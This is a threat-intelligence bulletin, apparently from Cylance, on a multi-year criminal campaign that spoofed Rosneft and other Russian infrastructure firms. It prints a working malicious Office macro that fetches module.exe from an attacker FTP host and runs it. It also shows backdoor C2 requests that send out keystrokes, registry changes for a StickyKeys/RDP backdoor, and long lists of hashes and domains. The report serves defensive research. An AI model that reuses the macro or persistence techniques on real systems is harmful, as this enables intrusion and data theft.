# Poking the Bear: Three-Year Campaign Targets Russian Critical Infrastructure **[threatvector.cylance.com/en_us/home/poking-the-bear-three-year-campaign-targets-russian-critical-infrastructure.html](https://threatvector.cylance.com/en_us/home/poking-the-bear-three-year-campaign-targets-russian-critical-infrastructure.html)** [by Cylance Threat Intelligence Bulletin | December 11, 2018](http://threatvector.cylance.com/en_us/contributors/cylance-threat-intelligence-bulletin.html) Nation-state conflict has come to dominate many of the policy discussions and much of the strategic thinking about cybersecurity. When events of geopolitical significance hit the papers, researchers look for parallel signs of sub rosa cyber activity carried out by statesponsored threat actors—espionage, sabotage, coercion, information operations—to complete the picture. After all, behind every story may lurk a cyber campaign. But ordinary criminals read the newspaper too and are keenly aware of the bias some researchers bring to the table. Exploiting that bias can provide additional camouflage, another layer of seeming invisibility, making threat actors harder to detect. In this Threat Intelligence Bulletin, we’ll show how an investigation into the apparent targeting of a state-owned Russian oil company led to the uncovering not of a statesponsored campaign but of the bold activity of what we believe to be a criminal effort motivated by the oldest of incentives—money. ## Background Rosneft calls itself the world’s largest publicly traded oil company, and, according to recent analysis in the New York Times, it is also a prominent [foreign policy tool of the Russian](https://www.nytimes.com/2017/10/29/business/energy-environment/russia-venezula-oil-rosneft.html) government. More than half of the company is owned by Moscow and serves as a major pillar of critical infrastructure for Russia as well as other neighboring nation states. So when a deal reportedly worth an excess of $10 billion was [announced to take nearly 20%](https://apnews.com/661b47f59d894a9fbb316757dda908ea) of the company private, news organizations around the world took note. [The deal quickly became the subject of international political intrigue: Who were the](https://www.reuters.com/article/us-russia-rosneft-privatisation-insight/how-russia-sold-its-oil-jewel-without-saying-who-bought-it-idUSKBN1582OH) buyers? Why was it sold? Who brokered the deal? Facts that became even more apparent [when the transaction received conspicuous mention in the now-infamous Steele Dossier.](https://www.documentcloud.org/documents/3259984-Trump-Intelligence-Allegations.html) Reporters, business leaders, and international observers also focused scrutiny on Rosneft [in part because the deal was, according to news reports, fraught with delays and setbacks](https://www.reuters.com/article/rosneft-qatar/qatar-steps-in-to-rescue-rosnefts-troubled-stake-sale-to-china-idUSL8N1SB6C1) [and came to involve a cast of characters that reportedly included a former Qatari diplomat](https://slate.com/news-and-politics/2018/05/michael-cohens-meetings-with-michael-flynn-and-ahmed-al-rumaihi-might-be-the-key-to-unlocking-the-steele-dossier.html) turned head of a sovereign wealth fund. Everything we learned about Rosneft in the last few years—its status as critical infrastructure, the huge sums of money involved in its privatization, its domestic and international political significance—made it a highly likely and legitimate target of foreign espionage efforts. ----- thought that was exactly what we were looking at: another state or state-sponsored espionage effort. But we soon discovered that our initial impressions were flawed. ## Evolution of a Threat In July 2017, Cylance stumbled upon some interesting macros embedded in Word documents we uncovered in a common malware repository that seemed to be aimed at Russian-speaking users. We observed the same type of document resurface in the beginning of 2018 and decided to take a closer look. Upon closer inspection, we noticed that the malware author meticulously used command and control (C2) domains which very closely mimicked their real counterparts in the Russian oil and gas industries, in particular Rosneft and subsidiaries of Rosneft. As we investigated further, we discovered that the threat actor had created similar sites to mimic more than two dozen mostly state-owned oil, gas, chemical, agricultural, and other critical infrastructure organizations, in addition to major Russian financial exchanges. The first Rosneft-related site we came across was “rnp-rosneft[.]ru” which was designed to resemble the legitimate webpage “mp-rosneft[.]ru”. The only reference to this domain we could identify was the email address “sec_hotline@mp-rosneft[.]ru” which was used by Rosneft for confidentially reporting corporate fraud, corruption, and embezzlement. After a bit of malware excavation, we discovered that the author had been operating for more than three years with very few changes to the actual malware used other than his/her targets. Interestingly, we uncovered evidence that suggests the actor started out targeting the gaming community, specifically users of Steam, then quickly evolved to more lucrative endeavors. ## Technical Analysis Phishing Documents Analysis Cylance researchers identified several phishing documents which used Microsoft Office macros to deliver malicious implants to their targets. It’s not entirely clear whether these were specifically targeted at isolated groups or utilized the old spray-and-pray method to cast a much wider net. Let’s take a look at one: **SHA256: 7bb9f72436bcbb5fcb190ebc2cce77e1ea41ba0e6614bf2347b4514e7d65da4a** **Filename: На ознакомление.doc ~ For Review.doc** Sub AutoOpen() ' ' AutoOpen [redacted] ' ----- Dim fso, tf Dim St As String Dim LocalFile As String Set fso = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("WScript.shell") LocalFile = Environ("APPDATA") & "\1.cmd" St = "cd %APPDATA%" & vbNewLine St = St + "echo open rnp-rosneft.ru>>1.txt" & vbNewLine St = St + "echo admin_root>>1.txt" & vbNewLine St = St + "echo [redacted]>>1.txt" & vbNewLine St = St + "echo cd /public_html/>>1.txt" & vbNewLine St = St + "echo binary>>1.txt" & vbNewLine St = St + "echo get module.exe module.exe>>1.txt" & vbNewLine St = St + "echo bye>>1.txt" & vbNewLine St = St + "ftp.exe -s:1.txt & start module.exe & del /f 1.txt & del /f 1.cmd" Set tf = fso.CreateTextFile(LocalFile, True) tf.Write (St) tf.Close If fso.FileExists(LocalFile) = True Then Selection.WholeStory Selection.Delete Unit:=wdCharacter, Count:=1 objShell.Run "cmd /K cd %APPDATA% & 1.cmd", 0 Selection.TypeText Text:="????????? ??????" + "???" End If End Sub _Figure 1: Macro Contents of Phishing Document_ At a high level, this macro will write a number of FTP commands to a text file named “1.txt” in %APPDATA%. When executed by the last command it will login and download a file from an ftp server hosted on “rnp-rosneft[.]ru” and save it as “module.exe”. It then starts the “module.exe” binary and deletes another file named “1.cmd”. The binary “module.exe” was a modern variant of a family of malware that ESET calls “RedControle.” Cylance identified several other phishing documents which operated in a similar vein that are listed in the Appendix. ## Malware Analysis We were able to recover several recent samples associated with phishing attempts connected to the rnp-rosfnet[.]ru domain as well as some older samples tied to trstorg[.]ru from July 2017. From what we could gather, “tstorg[.]ru” was originally the website of a ----- and road-building equipment; the company specialized in providing parts for Caterpillar, Komatsu, Volvo, Fiat, and Hitachi equipment. This sample was first submitted to online virus scanners in July 2017 and detected by only 13 companies at that time: **SHA256 of 2017 RedControle Sample:** 736aa303b35ee23204e0e7d48cb31f77605234609c2b3d89a054b7c3ec2c0544 **Filenames:** Актуальный ПРАЙС10.07.2017.exe, ApMsgFwd.exe, SetLogin1Connect.exe The backdoor was programmed in Delphi and communicates over HTTP to two C2 servers. It sends information about the IP address, hostname, and attached drives in its initial communications. It first attempts to communicate directly to the IP address “91.211.245[.]246” on TCP port 80 and then will attempt to communicate to “83.166.242[.]15” on TCP port 17425. Keystroke data, clipboard data, as well as window names are communicated in clear text via HTTP to the 91.211.245[.]246 in near-real time as the victim interacts with their computer. The information is collected using a well-known method leveraging the SetWindowsHookExA API. Commands are received from the other C2 server “83.166.245[.]15” in what appears to be cleartext; however, the backdoor also has the ability to communicate over SSL using the Delphi Indy library: GET /buffer.php?buffer=--------------------------------------------------------------------%0D%0AIDA++C%3A%5CDocuments+and+Settings%5CAdministrator%5CDesktop%5Ctst%5CApMs gFwd.exe%0D%0A--------------------------------------------------------------------%0D%0A17425%0D%0A---------------------------------------------------------------------%0D%0A HTTP/1.1 Host: 91.211.245.246 Accept: text/html, */* Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library) GET /key.php?key=--------------------------------------------------------------------%0D%0AC%3A%5CWINDOWS%5Csystem32%5Ccmd.exe+-+FakeNet.exe%0D%0A--------------------------------------------------------------------%0D%0Ahelp%0D%0A%0D%0A--------------------------------------------------------------------%0D%0A HTTP/1.1 Host: 91.211.245.246 Accept: text/html, */* Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library) _Figure 2: Example TCP HTTP Requests Sending Keystroke and Window Data_ ----- registry hive “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ApMsgFwd.exe”. The backdoor had the ability to upload and download files, manipulate files and folders, compress and decompress files using ZLIB, enumerate drive information and host information, elevate privileges, capture screenshots and webcam pictures, block and/or simulate user input, log keystrokes, and manipulate processes on the infected system. Directives from the C2 were randomly broken up by the character “_” in an attempt to likely evade HIDS and NIDS signatures such as the command “ST_A_RT_FI_LE”. Later versions of RedControle used randomized strings broken up by the same “_” character to further hinder signature-based analysis and reverse engineering efforts. In the sample Cylance researchers analyzed, the initial connection looked something like this: Where the string in BLUE was sent by the C2 server and the string in RED was sent by the victim as an initial check in containing the IP address and a unique victim identifier. The backdoor operated using a series of threads which were designed to segment different backdoor functionality into autonomous threads which ran based on different pre-defined Delphi-based timers. The backdoor appeared to be a mishmash of different authorship with the keylogger portion containing Portuguese language strings and other functions related to process manipulation containing references to Slavic language strings. These strings were eventually removed or obfuscated in later versions. ## The Dropper Cylance identified an executable dropper: b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932 The dropper planted a version of RedControle on the system as well as another interesting binary while showing the potential victim a nice picture of a holiday present. The dropper was relatively uninteresting; however, a Sticky Keys backdoor would also be placed on the system, which warranted additional analysis. **Dropper SHA256 Hash:** b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932 **Associated RedControle SHA256:** 8f7cf81d8bfb3780b48693020a18071a9fd382d06b0b7932226b4d583b03c3af ----- The dropper created two executable files within the folder “%ALLUSERSPROFILE%\Documents”, “svhost.exe” and “system.exe” and created two associated Run keys to maintain persistence for both executables. The program “svhost.exe” was the aforementioned RedControle variant with network callbacks to the domain “trstorg[.]ru” and the IP address “83.166.243[.]48”. The “system.exe” file was a StickyKeys backdoor programmed in Delphi. It first opened TCP port 3389 in the Windows Firewall and then set the following Registry Keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger -> C:\WINDOWS\system32\taskmgr.exe HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections -> null value The file was primarily responsible for enabling RDP on the target system and performing a sticky keys hijack to point to the legitimate “taskmgr.exe” binary. If our readers are unfamiliar with StickyKeys, it was originally designed for people who have difficulty holding down two or more keys simultaneously. StickyKeys can be enabled on Windows by rapidly pressing the shift key five times. The registry key above will simultaneously launch the Task Manager binary “taskmgr.exe” along with the intended StickyKeys binary. The StickyKeys backdoor can then test corresponded to “google.ru” and various subdomains. If the test is successful, it will make the following HTTP request to “trstorg[.]ru” on TCP port 80: GET /bas.php HTTP/1.1 User-Agent: DMFR Host: trstorg.ru Cache-Control: no-cache HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Jan 2017 17:18:48 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=60 X-Powered-By: PHP/5.5.9-1ubuntu4. _Figure 3: Example Request and Server Response from StickyKeys Backdoor_ This particular sample will no longer work as the IP address “80.254.96[.]251” appeared to have been reassigned to another party and no longer operates a webserver. ## Open Source Intelligence Analysis The RedControle backdoors frequently created the unique mutex ----- which directly links the above samples to the following hashes through open source intelligence: 10c5bf2733b7147c3663baa597b2e960069edcadf794d1ec299dfcbab489dfe1 11e8692a2d2995b105591c42fcd7a0427223f2a6b16f8e6614820024cb3415f4 27614102c5386333ecd43bb086752397726783f4d1e7fe0c1735686b5199a623 4f6de2c6d6c80b459f0bdb88cf2ce22e44ad4f3045909cbd8c1fb7632956fb63 51bc34307923d83b795319877924c9ed926366758d4662c36dce58f3a1ae20bb 7a7a139b55cd5ddcbcb8f91be1d2a247d42243d2d4a595252851987075a4338d 93b2e268ca5b8fede64edc0da7195adebbe8fa490de96b5eec1489b7868710f3 a077c085dccb900ddab2542b4b332f7c43b3674c71d5cd11afdd2861b6fec2b8 c8ca5e80d3f14102fd81b0fda54120d6ce9519a72b9d3aca23cf9b5cc8c93549 Several of these samples communicated to the domains “sxe-csgo[.]net” and “h84622.s05.test-hf[.]su”. These domains led to two primary IP addresses: “91.227.16[.]115” and “91.227.16[.]6” as well as a few hundred unique file hashes. The IP addresses “109.68.190[.]244” and “46.38.50[.]106” which resolved to “sxecsgo[.]net” in 2015 and 2016 let Cylance definitively tie this subset of activity to activity targeting the Russian Steam community as well as the Counterstrike and CS:Go [communities previously documented here, here, and here.](https://securelist.com/all-your-creds-are-belong-to-us/74137/) ## Infrastructure Analysis The threat actor left bits of infrastructure open over time and Cylance was able to harvest some of the server-side scripts utilized by the malware for tracking and recording data stolen from intended victims. Additionally, the attacker utilized Cloudflare for free bulk SSL certificates, which inadvertently exposed a number of domains. The attacker put a lot of time and effort into closely imitating legitimate domains and continually altered their targets over time. They would also occasionally register legitimate domains after the domains had expired. The actor relied heavily upon the Lithuanian provider “vpsnet[.]lt” likely as a result of the low cost overhead of a couple euros per month per virtual private server (VPS). ## Conclusions When we first discovered that the threat actor was using more than two dozen websites to mimic real Russian critical infrastructure companies, we were intrigued. The effort required to set up those domains seemed disproportionate to the perceived benefit of using them simply as command-and-control infrastructure. ----- 2017 and entitled (in Google’s translation to English) _Attack of the Clones: How Schemes_ _Work with Fake Sites of Rosneft and Other Large Companies._ The author was Ilya Sachkov, the founder and CEO of infosec company Group-IB and a member of cybercrime expert committees in the Council of Europe and the OSCE. The article described what appeared to be unpublished Group-IB research findings into an elaborate criminal scheme wherein a threat actor was creating near-clones of legitimate Russian critical infrastructure companies—Rosneft most prominent among them—in order to harvest credentials and perpetuate fraud. In the article, Sachkov provided screen shots of many of the mimicked sites to establish just how painstakingly close to the original these fake sites were designed to look. The article referenced several of the companies and websites by name, which Group-IB said were part of the fraud campaign. At least one of the affected companies was described in the article as being a client of Group-IB. That company’s domain, as well as nearly all of the other domains cited by Group-IB were also uncovered in the Cylance investigation. For example, in addition to Rosneft, they included: Mendeleevkazot, HCSDS, and EuroChem. Mendeleevkazot is a fertilizer manufacturer and part of a larger Russian critical infrastructure holding company. HCSDS is an acronym for a Siberian Business Union, a holding company comprised of several Russian critical infrastructure companies. EuroChem (Group-IB’s apparent client) is a Swiss-based fertilizer company with its primary mining activity in Russia. Its name came up in several news-related searches indicating its involvement in large financial transactions as well as geopolitical maneuvering. Given the overlap in findings and the direct connection to past criminal campaigns targeting the gaming community, it seemed clear we were looking at the same operation—a criminal operation, not nation-state espionage activity. The line between well-organized criminal efforts and nation-state activity can often be blurry, but practitioners and consumers of threat intelligence should beware of inherent biases. As we have shown in this Bulletin, what appears at first blush to be a clear indicator of nation-state malfeasance may in fact simply allow a criminal to hack your way of thinking shortly before hacking your organization. ## Appendix **_Phishing Documents Hashes:_** 7bb9f72436bcbb5fcb190ebc2cce77e1ea41ba0e6614bf2347b4514e7d65da4a cb1cb113de38ae4ea1312d133d485769ecb38f2a9306f497788cd8fbb6fc4707 dcec00c780cb71b955e32231d5340e90e51c3c1828262ec7cfa239e431accf5b 68ab10ca4f823d0246822f102c412430e0a57e2026b3f0a1fd97f200e9e0e707 **_RedControle Hashes:_** ----- c12e50e7c9162d8c690d3474400fe2f5d0a9c2903adbd2837d3a9023ba86fb79 9949d5d1adb4a44463363c04678dbff0d45aeff740c754aff0c3d7b54d26016d 0556aca3b5f3a4797ca36150a4b1423ec42a6827749599395d35e369f6df5568 302866c5209e8f0b0b78bbc3411e38777de9ca59a8e1c6fa0ffdf7e35aecb2aa 63d8f1566b5d0fa6459a89a0d48a163b8a356bdf2c0bec4c648b253bd8f36bb9 8f7cf81d8bfb3780b48693020a18071a9fd382d06b0b7932226b4d583b03c3af 9949d5d1adb4a44463363c04678dbff0d45aeff740c754aff0c3d7b54d26016d aa8dc9ad33ffb69b19d2d685e302888eb557a0159c15689c0eb36b6e649c4f3a c0b090eca76ccff3b8e7da9a3d94418d0102277a40b1dadf7fd9096ddd668e79 d31ee9ca7eb1d0fce0f688938269c7200c982f0f13daa9d40a4ce0824de6cc18 **_StickyKeys Hash:_** 6e476a2ef02986a13274fb2a126ed60a1ede252919d6993de03622aaa7fe6228 **_Dropper Hash:_** b65125ee14f2bf12a58f67c623943658dd457e5b40b354da0975d7615fe9d932 **_C2 and Phishing Domains:_** 10-sendmail[.]ru 3-sendmail[.]ru a-nhk[.]ru acron[.]ru[.]com agrarnik-ooo[.]ru agrocentrer-eurohem[.]ru agroudo[.]ru amonni[.]ru audemar-piguet[.]ru autch-mail[.]ru azot-n[.]ru azot-sds[.]ru azotsds[.]ru azs-gazpromneft[.]ru balecsm[.]ru barsintez[.]ru bashneft-centralasia[.]ru bashneft[.]su berkovetc[.]ru bitmain[.]org[.]ru bitum-gazpromneft[.]ru bitum-rosneft[.]ru bitum-samara[.]ru bitumen-rosneft[.]ru bitumnpk[.]ru bor silicat[ ]ru ----- bulgarsyntezi[.]ru bunker-rosneft[.]ru card-rn[.]ru cargill[.]com[.]ru center-nic[.]ru chem-torg[.]ru chemcourier[.]ru chickenpaws[.]ru china-technika[.]ru combisapsan[.]ru contacts[.]rosneft-opt[.]su cryptoman[.]org[.]ru cuban-phosagro[.]ru dc-02ec0b5f-mail[.]mail-autch[.]ru dc-0649e3d7-mail[.]mp-star[.]ru dc-45e81045-mail[.]cibur[.]ru dc-99de0f72f24b[.]3-sendmail[.]ru dv-china[.]ru electronrg[.]ru euro-bitum[.]ru euro-chimgroup[.]ru eurochem-nevinnomissk[.]ru eurochem-novomoskovsk[.]ru eurochem-novomoskovsk[.]ru[.]com eurochem-orel[.]ru eurochem-trading[.]com eurochem-trading[.]ru eurochemnovomoskovsk[.]ru eurochim[.]ru[.]com eurohem-novomokcovsk[.]ru eurohem[.]ru eurohemgroup[.]ru exp[.]gazpromlpj[.]ru expert-cabel[.]ru farr-post[.]ru fesagro[.]ru flatglas[.]ru frigat-m[.]ru g-pntrade[.]ru gazprom-bitumen[.]ru gazprom-centralasia[.]ru gazprom-international[.]su gazpromlpg[.]com gazpromlpj[.]ru l [ ] ----- gispnd[.]ru gpn-salavat[.]ru hcsds-azot[.]ru imap[.]mrggazprom[.]ru inter-finans[.]ru inter-lens[.]ru john-dir[.]ru kartll[.]ru kolomna-profil[.]ru kub-oil[.]ru kuban-phosagro[.]ru kubeliai[.]lt kubmaslozavod[.]ru kyazot[.]ru kyrgyzstan-gazprom[.]ru lpggazprom[.]ru lubricants-rn[.]ru lubricants-rosneft[.]com lubricants-rosneft[.]ru lukoil[.]com mag-numoil[.]ru map[.]ros-razvitie[.]ru margcom[.]ru masterhoste[.]ru mazutibitum[.]ru mc-gp[.]ru mekstekla[.]ru mendeleevscazot[.]ru mendeleevsk-azot[.]ru metalloprakat[.]ru mir-polimer[.]ru mnpz-gazpromneft[.]ru mp-star[.]ru mpt-o[.]ru mrg-gazprom[.]ru mrggazprom[.]ru mta5[.]boommail[.]org nic-center[.]ru nknpz[.]rosneft-opt[.]su nl-mk[.]ru oil-gazpromneft[.]ru omega-metal[.]ru onlinecontract[.]su ooo-agrarnik[.]com t d [ ] t ----- phaz[.]ru polietileni[.]ru poligal-vostok[.]ru polimer-trubi[.]ru polimer16[.]ru[.]com pop[.]gazprom-centralasia[.]ru pop[.]mnpz-gazpromneft[.]ru pop[.]opt-rosneft[.]ru pop[.]rnp-rosneft[.]ru pop[.]ros-razvitie[.]ru postaitaliana[.]win prof-nastillist[.]ru prof-zavod[.]ru profzavod[.]net promximiya[.]ru prosintezi[.]ru pushkinomill[.]ru refas[.]rnp-rosneft[.]ru refinery-yaroslavl[.]ru refinery-yaroslavl[.]su rn-cpr[.]ru rn-lubricants[.]ru rnp-rosneft[.]ru roamingupdate[.]eu ros-eurochem[.]ru ros-metal[.]ru ros-nefti[.]ru ros-razvitie[.]ru rosagrotrayd[.]ru rosneft-centralasia[.]ru rosneft-de[.]com rosneft-opt[.]com rosneft-opt[.]su rosneft-tender[.]ru rosneft-tender[.]su rosneft-tuapse[.]ru rospolimery[.]ru rost-selmash[.]ru rps[.]ru[.]com ru-uralchem[.]ru ru-uralhim[.]ru ruproflist[.]ru rus-agrohim[.]ru rusagro-him[.]ru hi [ ] ----- saharzol[.]com sal-stek[.]ru salavstek[.]ru salstec[.]ru salstek[.]com[.]ru samp[.]real-city[.]lt sarat-steklo[.]ru saratovstroisteklo[.]ru saratovstroy-steklo[.]ru severstal[.]com[.]ru sibur[.]com[.]ru sibur[.]ru[.]com siburint[.]ru simf-khp[.]ru smtp[.]gazpromlpj[.]ru spectech-china[.]ru spi-mex[.]ru steklo-stroj[.]ru successex[.]ru successex24[.]ru sx[.]perfecttool[.]net ta-bitum[.]ru tdbkh[.]ru teh-mail[.]ru tektorg-rosneft[.]ru tender-rosneft[.]com tender-rosneft[.]net tender-rosneft[.]ru tender-rosneft[.]su tender[.]ros-nefti[.]ru tiret-salt[.]ru titanomsk[.]ru tmez[.]ru tolyatiazot[.]ru transneft[.]su trstorg[.]ru tsenazabora[.]ru tuapse-rosneft[.]ru ufaneftehim[.]bashneft[.]su ufaorgsintez[.]bashneft[.]su ural-met[.]su uralchem[.]net[.]ru uralchemm[.]ru uralchim[.]com l hi [ ] [ ] ----- vitohim-rostov[.]ru vmznasos[.]ru vmzz[.]ru vojxua[.]iheys[.]in volga-phosagro[.]ru vostok-polygal[.]ru wapmafija[.]eu world-provodnik[.]ru wtpc[.]ru xn----7sbiki4aifik1ax[.]xn--p1ai xn----8sbyfdnfhp0c[.]xn--p1ai xn----gtbcbb8bdhqbmdl1a[.]xn--p1ai xn----gtbcbb8bdhqbmdl1a5j[.]xn--p1ai xn--80aaoboarccvfll0ah5mza[.]xn--p1ai xn--e1apchgin[.]xn--p1ai xn--j1aicfcj5e[.]xn--e1apchgin[.]xn--p1ai yandex[.]mail-autch[.]ru yug-polimer[.]ru Share It: [Research & Intelligence](https://threatvector.cylance.com/en_us/category/research-and-intelligence.html) About The Author Cylance Threat Intelligence Bulletin Monthly bulletin from the Cylance Threat _Intelligence Team._ [Author's Bio](http://threatvector.cylance.com/en_us/contributors/cylance-threat-intelligence-bulletin.html) -----